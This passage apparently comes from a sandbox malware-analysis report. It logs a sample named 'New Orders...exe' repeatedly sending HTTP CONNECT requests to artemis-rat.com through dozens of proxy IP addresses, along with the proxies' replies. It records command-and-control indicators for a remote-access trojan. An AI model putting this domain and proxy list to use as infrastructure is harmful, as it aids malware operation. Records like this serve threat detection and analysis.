                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1074192.168.2.95242645.65.65.1841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.878971100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1075192.168.2.95246051.75.125.208409987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.881839037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930468082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.945308924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.039127111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.132496119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.132508993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.135554075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.132533073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1076192.168.2.953217104.23.128.174807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.882160902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.036838055 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1077192.168.2.95315437.235.48.19807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.882623911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1078192.168.2.953210162.159.241.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.882823944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.044177055 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1079192.168.2.952996122.114.232.1378087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.883399963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1080192.168.2.952474162.241.46.40615797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.885776997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1081192.168.2.953093116.199.168.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.886004925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1082192.168.2.953150185.217.143.23807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.886163950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1083192.168.2.950742172.93.111.87158057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.889000893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976471901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985387087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.976720095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1084192.168.2.95321292.204.134.38561777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.896867037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1085192.168.2.953164185.38.111.180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.897259951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:44.218250990 CET75INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:44.546021938 CET103INHTTP/1.1 400 Bad Request
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Connection: close
                                                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                        Data Ascii: 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1086192.168.2.95318751.222.241.8362197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.903136015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.476963997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.273463964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664419889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367350101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.070257902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773618937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165493011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.773123980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1087192.168.2.9531715.75.192.13807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.921864986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1088192.168.2.95317370.166.167.55577457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.930135965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1089192.168.2.95322772.10.164.178112517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.931647062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.643299103 CET28INHTTP/1.1 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1090192.168.2.95254014.116.188.18231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.936058044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.495446920 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1091192.168.2.95316845.11.95.16550397672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.942744970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1092192.168.2.95319246.51.249.13531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.946361065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.211731911 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1093192.168.2.95253498.178.72.21109197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.951235056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1094192.168.2.953166103.200.135.22941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.965893984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1095192.168.2.953185211.222.252.18781977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.976145983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1096192.168.2.953184219.243.212.11884437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.983920097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.739228964 CET22INHTTP/1.1 502 ERROR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1097192.168.2.95254185.239.121.16841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.984483957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1098192.168.2.95071591.134.140.160272077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.984487057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.163988113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164283037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.164113045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.165345907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.273159981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:20.273196936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1099192.168.2.95319458.75.126.23541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.987030983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1100192.168.2.953172103.118.44.13680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.074460983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
